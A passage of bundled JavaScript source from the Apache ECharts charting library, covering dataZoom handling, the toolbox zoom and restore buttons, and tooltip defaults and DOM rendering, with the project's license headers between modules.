limitations\n* under the License.\n*/\n\nvar DataZoomView = Component$1.extend({\n\n    type: 'dataZoom',\n\n    render: function (dataZoomModel, ecModel, api, payload) {\n        this.dataZoomModel = dataZoomModel;\n        this.ecModel = ecModel;\n        this.api = api;\n    },\n\n    /**\n     * Find the first target coordinate system.\n     *\n     * @protected\n     * @return {Object} {\n     *                   grid: [\n     *                       {model: coord0, axisModels: [axis1, axis3], coordIndex: 1},\n     *                       {model: coord1, axisModels: [axis0, axis2], coordIndex: 0},\n     *                       ...\n     *                   ],  // cartesians must not be null/undefined.\n     *                   polar: [\n     *                       {model: coord0, axisModels: [axis4], coordIndex: 0},\n     *                       ...\n     *                   ],  // polars must not be null/undefined.\n     *                   singleAxis: [\n     *                       {model: coord0, axisModels: [], coordIndex: 0}\n     *                   ]\n     */\n    getTargetCoordInfo: function () {\n        var dataZoomModel = this.dataZoomModel;\n        var ecModel = this.ecModel;\n        var coordSysLists = {};\n\n        dataZoomModel.eachTargetAxis(function (dimNames, axisIndex) {\n            var axisModel = ecModel.getComponent(dimNames.axis, axisIndex);\n            if (axisModel) {\n                var coordModel = axisModel.getCoordSysModel();\n                coordModel && save(\n                    coordModel,\n                    axisModel,\n                    coordSysLists[coordModel.mainType] || (coordSysLists[coordModel.mainType] = []),\n                    coordModel.componentIndex\n                );\n            }\n        }, this);\n\n        function save(coordModel, axisModel, store, coordIndex) {\n            var item;\n            for (var i = 0; i < store.length; i++) {\n                if (store[i].model === coordModel) {\n                    item = store[i];\n                    break;\n                }\n            }\n            if (!item) {\n                store.push(item = {\n                    model: coordModel, axisModels: [], coordIndex: coordIndex\n                });\n            }\n            item.axisModels.push(axisModel);\n        }\n\n        return coordSysLists;\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nDataZoomModel.extend({\n    type: 'dataZoom.select'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nDataZoomView.extend({\n    type: 'dataZoom.select'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterProcessor({\n\n    // `dataZoomProcessor` will only be performed in needed series. Consider if\n    // there is a line series and a pie series, it is better not to update the\n    // line series if only pie series is needed to be updated.\n    getTargetSeries: function (ecModel) {\n        var seriesModelMap = createHashMap();\n\n        ecModel.eachComponent('dataZoom', function (dataZoomModel) {\n            dataZoomModel.eachTargetAxis(function (dimNames, axisIndex, dataZoomModel) {\n                var axisProxy = dataZoomModel.getAxisProxy(dimNames.name, axisIndex);\n                each$1(axisProxy.getTargetSeriesModels(), function (seriesModel) {\n                    seriesModelMap.set(seriesModel.uid, seriesModel);\n                });\n            });\n        });\n\n        return seriesModelMap;\n    },\n\n    modifyOutputEnd: true,\n\n    // Consider appendData, where filter should be performed. Because data process is\n    // in block mode currently, it is not need to worry about that the overallProgress\n    // execute every frame.\n    overallReset: function (ecModel, api) {\n\n        ecModel.eachComponent('dataZoom', function (dataZoomModel) {\n            // We calculate window and reset axis here but not in model\n            // init stage and not after action dispatch handler, because\n            // reset should be called after seriesData.restoreData.\n            dataZoomModel.eachTargetAxis(function (dimNames, axisIndex, dataZoomModel) {\n                dataZoomModel.getAxisProxy(dimNames.name, axisIndex).reset(dataZoomModel, api);\n            });\n\n            // Caution: data zoom filtering is order sensitive when using\n            // percent range and no min/max/scale set on axis.\n            // For example, we have dataZoom definition:\n            // [\n            //      {xAxisIndex: 0, start: 30, end: 70},\n            //      {yAxisIndex: 0, start: 20, end: 80}\n            // ]\n            // In this case, [20, 80] of y-dataZoom should be based on data\n            // that have filtered by x-dataZoom using range of [30, 70],\n            // but should not be based on full raw data. Thus sliding\n            // x-dataZoom will change both ranges of xAxis and yAxis,\n            // while sliding y-dataZoom will only change the range of yAxis.\n            // So we should filter x-axis after reset x-axis immediately,\n            // and then reset y-axis and filter y-axis.\n            dataZoomModel.eachTargetAxis(function (dimNames, axisIndex, dataZoomModel) {\n                dataZoomModel.getAxisProxy(dimNames.name, axisIndex).filterData(dataZoomModel, api);\n            });\n        });\n\n        ecModel.eachComponent('dataZoom', function (dataZoomModel) {\n            // Fullfill all of the range props so that user\n            // is able to get them from chart.getOption().\n            var axisProxy = dataZoomModel.findRepresentativeAxisProxy();\n            var percentRange = axisProxy.getDataPercentWindow();\n            var valueRange = axisProxy.getDataValueWindow();\n\n            dataZoomModel.setCalculatedRange({\n                start: percentRange[0],\n                end: percentRange[1],\n                startValue: valueRange[0],\n                endValue: valueRange[1]\n            });\n        });\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterAction('dataZoom', function (payload, ecModel) {\n\n    var linkedNodesFinder = createLinkedNodesFinder(\n        bind(ecModel.eachComponent, ecModel, 'dataZoom'),\n        eachAxisDim$1,\n        function (model, dimNames) {\n            return model.get(dimNames.axisIndex);\n        }\n    );\n\n    var effectedModels = [];\n\n    ecModel.eachComponent(\n        {mainType: 'dataZoom', query: payload},\n        function (model, index) {\n            effectedModels.push.apply(\n                effectedModels, linkedNodesFinder(model).nodes\n            );\n        }\n    );\n\n    each$1(effectedModels, function (dataZoomModel, index) {\n        dataZoomModel.setRawRange({\n            start: payload.start,\n            end: payload.end,\n            startValue: payload.startValue,\n            endValue: payload.endValue\n        });\n    });\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Only work for toolbox dataZoom. User\n * MUST NOT import this module directly.\n */\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Use dataZoomSelect\nvar dataZoomLang = lang.toolbox.dataZoom;\nvar each$16 = each$1;\n\n// Spectial component id start with \\0ec\\0, see echarts/model/Global.js~hasInnerId\nvar DATA_ZOOM_ID_BASE = '\\0_ec_\\0toolbox-dataZoom_';\n\nfunction DataZoom(model, ecModel, api) {\n\n    /**\n     * @private\n     * @type {module:echarts/component/helper/BrushController}\n     */\n    (this._brushController = new BrushController(api.getZr()))\n        .on('brush', bind(this._onBrush, this))\n        .mount();\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._isZoomActive;\n}\n\nDataZoom.defaultOption = {\n    show: true,\n    filterMode: 'filter',\n    // Icon group\n    icon: {\n        zoom: 'M0,13.5h26.9 M13.5,26.9V0 M32.1,13.5H58V58H13.5 V32.1',\n        back: 'M22,1.4L9.9,13.5l12.3,12.3 M10.3,13.5H54.9v44.6 H10.3v-26'\n    },\n    // `zoom`, `back`\n    title: clone(dataZoomLang.title)\n};\n\nvar proto$4 = DataZoom.prototype;\n\nproto$4.render = function (featureModel, ecModel, api, payload) {\n    this.model = featureModel;\n    this.ecModel = ecModel;\n    this.api = api;\n\n    updateZoomBtnStatus(featureModel, ecModel, this, payload, api);\n    updateBackBtnStatus(featureModel, ecModel);\n};\n\nproto$4.onclick = function (ecModel, api, type) {\n    handlers$1[type].call(this);\n};\n\nproto$4.remove = function (ecModel, api) {\n    this._brushController.unmount();\n};\n\nproto$4.dispose = function (ecModel, api) {\n    this._brushController.dispose();\n};\n\n/**\n * @private\n */\nvar handlers$1 = {\n\n    zoom: function () {\n        var nextActive = !this._isZoomActive;\n\n        this.api.dispatchAction({\n            type: 'takeGlobalCursor',\n            key: 'dataZoomSelect',\n            dataZoomSelectActive: nextActive\n        });\n    },\n\n    back: function () {\n        this._dispatchZoomAction(pop(this.ecModel));\n    }\n};\n\n/**\n * @private\n */\nproto$4._onBrush = function (areas, opt) {\n    if (!opt.isEnd || !areas.length) {\n        return;\n    }\n    var snapshot = {};\n    var ecModel = this.ecModel;\n\n    this._brushController.updateCovers([]); // remove cover\n\n    var brushTargetManager = new BrushTargetManager(\n        retrieveAxisSetting(this.model.option), ecModel, {include: ['grid']}\n    );\n    brushTargetManager.matchOutputRanges(areas, ecModel, function (area, coordRange, coordSys) {\n        if (coordSys.type !== 'cartesian2d') {\n            return;\n        }\n\n        var brushType = area.brushType;\n        if (brushType === 'rect') {\n            setBatch('x', coordSys, coordRange[0]);\n            setBatch('y', coordSys, coordRange[1]);\n        }\n        else {\n            setBatch(({lineX: 'x', lineY: 'y'})[brushType], coordSys, coordRange);\n        }\n    });\n\n    push(ecModel, snapshot);\n\n    this._dispatchZoomAction(snapshot);\n\n    function setBatch(dimName, coordSys, minMax) {\n        var axis = coordSys.getAxis(dimName);\n        var axisModel = axis.model;\n        var dataZoomModel = findDataZoom(dimName, axisModel, ecModel);\n\n        // Restrict range.\n        var minMaxSpan = dataZoomModel.findRepresentativeAxisProxy(axisModel).getMinMaxSpan();\n        if (minMaxSpan.minValueSpan != null || minMaxSpan.maxValueSpan != null) {\n            minMax = sliderMove(\n                0, minMax.slice(), axis.scale.getExtent(), 0,\n                minMaxSpan.minValueSpan, minMaxSpan.maxValueSpan\n            );\n        }\n\n        dataZoomModel && (snapshot[dataZoomModel.id] = {\n            dataZoomId: dataZoomModel.id,\n            startValue: minMax[0],\n            endValue: minMax[1]\n        });\n    }\n\n    function findDataZoom(dimName, axisModel, ecModel) {\n        var found;\n        ecModel.eachComponent({mainType: 'dataZoom', subType: 'select'}, function (dzModel) {\n            var has = dzModel.getAxisModel(dimName, axisModel.componentIndex);\n            has && (found = dzModel);\n        });\n        return found;\n    }\n};\n\n/**\n * @private\n */\nproto$4._dispatchZoomAction = function (snapshot) {\n    var batch = [];\n\n    // Convert from hash map to array.\n    each$16(snapshot, function (batchItem, dataZoomId) {\n        batch.push(clone(batchItem));\n    });\n\n    batch.length && this.api.dispatchAction({\n        type: 'dataZoom',\n        from: this.uid,\n        batch: batch\n    });\n};\n\nfunction retrieveAxisSetting(option) {\n    var setting = {};\n    // Compatible with previous setting: null => all axis, false => no axis.\n    each$1(['xAxisIndex', 'yAxisIndex'], function (name) {\n        setting[name] = option[name];\n        setting[name] == null && (setting[name] = 'all');\n        (setting[name] === false || setting[name] === 'none') && (setting[name] = []);\n    });\n    return setting;\n}\n\nfunction updateBackBtnStatus(featureModel, ecModel) {\n    featureModel.setIconStatus(\n        'back',\n        count(ecModel) > 1 ? 'emphasis' : 'normal'\n    );\n}\n\nfunction updateZoomBtnStatus(featureModel, ecModel, view, payload, api) {\n    var zoomActive = view._isZoomActive;\n\n    if (payload && payload.type === 'takeGlobalCursor') {\n        zoomActive = payload.key === 'dataZoomSelect'\n            ? payload.dataZoomSelectActive : false;\n    }\n\n    view._isZoomActive = zoomActive;\n\n    featureModel.setIconStatus('zoom', zoomActive ? 'emphasis' : 'normal');\n\n    var brushTargetManager = new BrushTargetManager(\n        retrieveAxisSetting(featureModel.option), ecModel, {include: ['grid']}\n    );\n\n    view._brushController\n        .setPanels(brushTargetManager.makePanelOpts(api, function (targetInfo) {\n            return (targetInfo.xAxisDeclared && !targetInfo.yAxisDeclared)\n                ? 'lineX'\n                : (!targetInfo.xAxisDeclared && targetInfo.yAxisDeclared)\n                ? 'lineY'\n                : 'rect';\n        }))\n        .enableBrush(\n            zoomActive\n            ? {\n                brushType: 'auto',\n                brushStyle: {\n                    // FIXME user customized?\n                    lineWidth: 0,\n                    fill: 'rgba(0,0,0,0.2)'\n                }\n            }\n            : false\n        );\n}\n\n\nregister$1('dataZoom', DataZoom);\n\n\n// Create special dataZoom option for select\n// FIXME consider the case of merge option, where axes options are not exists.\nregisterPreprocessor(function (option) {\n    if (!option) {\n        return;\n    }\n\n    var dataZoomOpts = option.dataZoom || (option.dataZoom = []);\n    if (!isArray(dataZoomOpts)) {\n        option.dataZoom = dataZoomOpts = [dataZoomOpts];\n    }\n\n    var toolboxOpt = option.toolbox;\n    if (toolboxOpt) {\n        // Assume there is only one toolbox\n        if (isArray(toolboxOpt)) {\n            toolboxOpt = toolboxOpt[0];\n        }\n\n        if (toolboxOpt && toolboxOpt.feature) {\n            var dataZoomOpt = toolboxOpt.feature.dataZoom;\n            // FIXME: If add dataZoom when setOption in merge mode,\n            // no axis info to be added. See `test/dataZoom-extreme.html`\n            addForAxis('xAxis', dataZoomOpt);\n            addForAxis('yAxis', dataZoomOpt);\n        }\n    }\n\n    function addForAxis(axisName, dataZoomOpt) {\n        if (!dataZoomOpt) {\n            return;\n        }\n\n        // Try not to modify model, because it is not merged yet.\n        var axisIndicesName = axisName + 'Index';\n        var givenAxisIndices = dataZoomOpt[axisIndicesName];\n        if (givenAxisIndices != null\n            && givenAxisIndices !== 'all'\n            && !isArray(givenAxisIndices)\n        ) {\n            givenAxisIndices = (givenAxisIndices === false || givenAxisIndices === 'none') ? [] : [givenAxisIndices];\n        }\n\n        forEachComponent(axisName, function (axisOpt, axisIndex) {\n            if (givenAxisIndices != null\n                && givenAxisIndices !== 'all'\n                && indexOf(givenAxisIndices, axisIndex) === -1\n            ) {\n                return;\n            }\n            var newOpt = {\n                type: 'select',\n                $fromToolbox: true,\n                // Default to be filter\n                filterMode: dataZoomOpt.filterMode || 'filter',\n                // Id for merge mapping.\n                id: DATA_ZOOM_ID_BASE + axisName + axisIndex\n            };\n            // FIXME\n            // Only support one axis now.\n            newOpt[axisIndicesName] = axisIndex;\n            dataZoomOpts.push(newOpt);\n        });\n    }\n\n    function forEachComponent(mainType, cb) {\n        var opts = option[mainType];\n        if (!isArray(opts)) {\n            opts = opts ? [opts] : [];\n        }\n        each$16(opts, cb);\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar restoreLang = lang.toolbox.restore;\n\nfunction Restore(model) {\n    this.model = model;\n}\n\nRestore.defaultOption = {\n    show: true,\n    /* eslint-disable */\n    icon: 'M3.8,33.4 M47,18.9h9.8V8.7 M56.3,20.1 C52.1,9,40.5,0.6,26.8,2.1C12.6,3.7,1.6,16.2,2.1,30.6 M13,41.1H3.1v10.2 M3.7,39.9c4.2,11.1,15.8,19.5,29.5,18 c14.2-1.6,25.2-14.1,24.7-28.5',\n    /* eslint-enable */\n    title: restoreLang.title\n};\n\nvar proto$6 = Restore.prototype;\n\nproto$6.onclick = function (ecModel, api, type) {\n    clear$1(ecModel);\n\n    api.dispatchAction({\n        type: 'restore',\n        from: this.uid\n    });\n};\n\nregister$1('restore', Restore);\n\nregisterAction(\n    {type: 'restore', event: 'restore', update: 'prepareAndUpdate'},\n    function (payload, ecModel) {\n        ecModel.resetOption('recreate');\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentModel({\n\n    type: 'tooltip',\n\n    dependencies: ['axisPointer'],\n\n    defaultOption: {\n        zlevel: 0,\n\n        z: 60,\n\n        show: true,\n\n        // tooltip主体内容\n        showContent: true,\n\n        // 'trigger' only works on coordinate system.\n        // 'item' | 'axis' | 'none'\n        trigger: 'item',\n\n        // 'click' | 'mousemove' | 'none'\n        triggerOn: 'mousemove|click',\n\n        alwaysShowContent: false,\n\n        displayMode: 'single', // 'single' | 'multipleByCoordSys'\n\n        renderMode: 'auto', // 'auto' | 'html' | 'richText'\n        // 'auto': use html by default, and use non-html if `document` is not defined\n        // 'html': use html for tooltip\n        // 'richText': use canvas, svg, and etc. for tooltip\n\n        // 位置 {Array} | {Function}\n        // position: null\n        // Consider triggered from axisPointer handle, verticalAlign should be 'middle'\n        // align: null,\n        // verticalAlign: null,\n\n        // 是否约束 content 在 viewRect 中。默认 false 是为了兼容以前版本。\n        confine: false,\n\n        // 内容格式器：{string}（Template） ¦ {Function}\n        // formatter: null\n\n        showDelay: 0,\n\n        // 隐藏延迟，单位ms\n        hideDelay: 100,\n\n        // 动画变换时间，单位s\n        transitionDuration: 0.4,\n\n        enterable: false,\n\n        // 提示背景颜色，默认为透明度为0.7的黑色\n        backgroundColor: 'rgba(50,50,50,0.7)',\n\n        // 提示边框颜色\n        borderColor: '#333',\n\n        // 提示边框圆角，单位px，默认为4\n        borderRadius: 4,\n\n        // 提示边框线宽，单位px，默认为0（无边框）\n        borderWidth: 0,\n\n        // 提示内边距，单位px，默认各方向内边距为5，\n        // 接受数组分别设定上右下左边距，同css\n        padding: 5,\n\n        // Extra css text\n        extraCssText: '',\n\n        // 坐标轴指示器，坐标轴触发有效\n        axisPointer: {\n            // 默认为直线\n            // 可选为：'line' | 'shadow' | 'cross'\n            type: 'line',\n\n            // type 为 line 的时候有效，指定 tooltip line 所在的轴，可选\n            // 可选 'x' | 'y' | 'angle' | 'radius' | 'auto'\n            // 默认 'auto'，会选择类型为 category 的轴，对于双数值轴，笛卡尔坐标系会默认选择 x 轴\n            // 极坐标系会默认选择 angle 轴\n            axis: 'auto',\n\n            animation: 'auto',\n            animationDurationUpdate: 200,\n            animationEasingUpdate: 'exponentialOut',\n\n            crossStyle: {\n                color: '#999',\n                width: 1,\n                type: 'dashed',\n\n                // TODO formatter\n                textStyle: {}\n            }\n\n            // lineStyle and shadowStyle should not be specified here,\n            // otherwise it will always override those styles on option.axisPointer.\n        },\n        textStyle: {\n            color: '#fff',\n            fontSize: 14\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$22 = each$1;\nvar toCamelCase$1 = toCamelCase;\n\nvar vendors = ['', '-webkit-', '-moz-', '-o-'];\n\nvar gCssText = 'position:absolute;display:block;border-style:solid;white-space:nowrap;z-index:9999999;';\n\n/**\n * @param {number} duration\n * @return {string}\n * @inner\n */\nfunction assembleTransition(duration) {\n    var transitionCurve = 'cubic-bezier(0.23, 1, 0.32, 1)';\n    var transitionText = 'left ' + duration + 's ' + transitionCurve + ','\n                        + 'top ' + duration + 's ' + transitionCurve;\n    return map(vendors, function (vendorPrefix) {\n        return vendorPrefix + 'transition:' + transitionText;\n    }).join(';');\n}\n\n/**\n * @param {Object} textStyle\n * @return {string}\n * @inner\n */\nfunction assembleFont(textStyleModel) {\n    var cssText = [];\n\n    var fontSize = textStyleModel.get('fontSize');\n    var color = textStyleModel.getTextColor();\n\n    color && cssText.push('color:' + color);\n\n    cssText.push('font:' + textStyleModel.getFont());\n\n    fontSize\n        && cssText.push('line-height:' + Math.round(fontSize * 3 / 2) + 'px');\n\n    each$22(['decoration', 'align'], function (name) {\n        var val = textStyleModel.get(name);\n        val && cssText.push('text-' + name + ':' + val);\n    });\n\n    return cssText.join(';');\n}\n\n/**\n * @param {Object} tooltipModel\n * @return {string}\n * @inner\n */\nfunction assembleCssText(tooltipModel) {\n\n    var cssText = [];\n\n    var transitionDuration = tooltipModel.get('transitionDuration');\n    var backgroundColor = tooltipModel.get('backgroundColor');\n    var textStyleModel = tooltipModel.getModel('textStyle');\n    var padding = tooltipModel.get('padding');\n\n    // Animation transition. Do not animate when transitionDuration is 0.\n    transitionDuration\n        && cssText.push(assembleTransition(transitionDuration));\n\n    if (backgroundColor) {\n        if (env$1.canvasSupported) {\n            cssText.push('background-Color:' + backgroundColor);\n        }\n        else {\n            // for ie\n            cssText.push(\n                'background-Color:#' + toHex(backgroundColor)\n            );\n            cssText.push('filter:alpha(opacity=70)');\n        }\n    }\n\n    // Border style\n    each$22(['width', 'color', 'radius'], function (name) {\n        var borderName = 'border-' + name;\n        var camelCase = toCamelCase$1(borderName);\n        var val = tooltipModel.get(camelCase);\n        val != null\n            && cssText.push(borderName + ':' + val + (name === 'color' ? '' : 'px'));\n    });\n\n    // Text style\n    cssText.push(assembleFont(textStyleModel));\n\n    // Padding\n    if (padding != null) {\n        cssText.push('padding:' + normalizeCssArray$1(padding).join('px ') + 'px');\n    }\n\n    return cssText.join(';') + ';';\n}\n\n// If not able to make, do not modify the input `out`.\nfunction makeStyleCoord(out, zr, appendToBody, zrX, zrY) {\n    var zrPainter = zr && zr.painter;\n\n    if (appendToBody) {\n        var zrViewportRoot = zrPainter && zrPainter.getViewportRoot();\n        if (zrViewportRoot) {\n            // Some APPs might use scale on body, so we support CSS transform here.\n            transformLocalCoord(out, zrViewportRoot, document.body, zrX, zrY);\n        }\n    }\n    else {\n        out[0] = zrX;\n        out[1] = zrY;\n        // xy should be based on canvas root. But tooltipContent is\n        // the sibling of canvas root. So padding of ec container\n        // should be considered here.\n        var viewportRootOffset = zrPainter && zrPainter.getViewportRootOffset();\n        if (viewportRootOffset) {\n            out[0] += viewportRootOffset.offsetLeft;\n            out[1] += viewportRootOffset.offsetTop;\n        }\n    }\n}\n\n/**\n * @alias module:echarts/component/tooltip/TooltipContent\n * @param {HTMLElement} container\n * @param {ExtensionAPI} api\n * @param {Object} [opt]\n * @param {boolean} [opt.appendToBody]\n *        `false`: the DOM element will be inside the container. Default value.\n *        `true`: the DOM element will be appended to HTML body, which avoid\n *                some overflow clip but intrude outside of the container.\n * @constructor\n */\nfunction TooltipContent(container, api, opt) {\n    if (env$1.wxa) {\n        return null;\n    }\n\n    var el = document.createElement('div');\n    el.domBelongToZr = true;\n    this.el = el;\n    var zr = this._zr = api.getZr();\n    var appendToBody = this._appendToBody = opt && opt.appendToBody;\n\n    this._styleCoord = [0, 0];\n\n    makeStyleCoord(this._styleCoord, zr, appendToBody, api.getWidth() / 2, api.getHeight() / 2);\n\n    if (appendToBody) {\n        document.body.appendChild(el);\n    }\n    else {\n        container.appendChild(el);\n    }\n\n    this._container = container;\n\n    this._show = false;\n\n    /**\n     * @private\n     */\n    this._hideTimeout;\n\n    // FIXME\n    // Is it needed to trigger zr event manually if\n    // the browser do not support `pointer-events: none`.\n\n    var self = this;\n    el.onmouseenter = function () {\n        // clear the timeout in hideLater and keep showing tooltip\n        if (self._enterable) {\n            clearTimeout(self._hideTimeout);\n            self._show = true;\n        }\n        self._inContent = true;\n    };\n    el.onmousemove = function (e) {\n        e = e || window.event;\n        if (!self._enterable) {\n            // `pointer-events: none` is set to tooltip content div\n            // if `enterable` is set as `false`, and `el.onmousemove`\n            // can not be triggered. But in browser that do not\n            // support `pointer-events`, we need to do this:\n            // Try trigger zrender event to avoid mouse\n            // in and out shape too frequently\n            var handler = zr.handler;\n            var zrViewportRoot = zr.painter.getViewportRoot();\n            normalizeEvent(zrViewportRoot, e, true);\n            handler.dispatch('mousemove', e);\n        }\n    };\n    el.onmouseleave = function () {\n        if (self._enterable) {\n            if (self._show) {\n                self.hideLater(self._hideDelay);\n            }\n        }\n        self._inContent = false;\n    };\n}\n\nTooltipContent.prototype = {\n\n    constructor: TooltipContent,\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    _enterable: true,\n\n    /**\n     * Update when tooltip is rendered\n     */\n    update: function () {\n        // FIXME\n        // Move this logic to ec main?\n        var container = this._container;\n        var stl = container.currentStyle\n            || document.defaultView.getComputedStyle(container);\n        var domStyle = container.style;\n        if (domStyle.position !== 'absolute' && stl.position !== 'absolute') {\n            domStyle.position = 'relative';\n        }\n        // Hide the tooltip\n        // PENDING\n        // this.hide();\n    },\n\n    show: function (tooltipModel) {\n        clearTimeout(this._hideTimeout);\n        var el = this.el;\n        var styleCoord = this._styleCoord;\n\n        el.style.cssText = gCssText + assembleCssText(tooltipModel)\n            // Because of the reason described in:\n            // http://stackoverflow.com/questions/21125587/css3-transition-not-working-in-chrome-anymore\n            // we should set initial value to `left` and `top`.\n            + ';left:' + styleCoord[0] + 'px;top:' + styleCoord[1] + 'px;'\n            + (tooltipModel.get('extraCssText') || '');\n\n        el.style.display = el.innerHTML ? 'block' : 'none';\n\n        // If mouse occsionally move over the tooltip, a mouseout event will be\n        // triggered by canvas, and cuase some unexpectable result like dragging\n        // stop, \"unfocusAdjacency\". Here `pointer-events: none` is used to solve\n        // it. Although it is not suppored by IE8~IE10, fortunately it is a rare\n        // scenario.\n        el.style.pointerEvents = this._enterable ? 'auto' : 'none';\n\n        this._show = true;\n    },\n\n    setContent: function (content) {\n        this.el.innerHTML = content == null ? '' : content;\n    },\n\n    setEnterable: function (enterable) {\n        this._enterable = enterable;\n    },\n\n    getSize: function () {\n        var el = this.el;\n        return [el.clientWidth, el.clientHeight];\n    },\n\n    moveTo: function (zrX, zrY) {\n        var styleCoord = this._styleCoord;\n        makeStyleCoord(styleCoord, this._zr, this._appendToBody, zrX, zrY);\n\n        var style = this.el.style;\n        style.left = styleCoord[0] + 'px';\n        style.top = styleCoord[1] + 'px';\n    },\n\n    hide: function () {\n        this.el.style.display = 'none';\n        this._show = false;\n    },\n\n    hideLater: function (time) {\n        if (this._show && !(this._inContent && this._enterable)) {\n            if (time) {\n                this._hideDelay = time;\n                // Set show false to avoid invoke hideLater mutiple times\n                this._show = false;\n                this._hideTimeout = setTimeout(bind(this.hide, this), 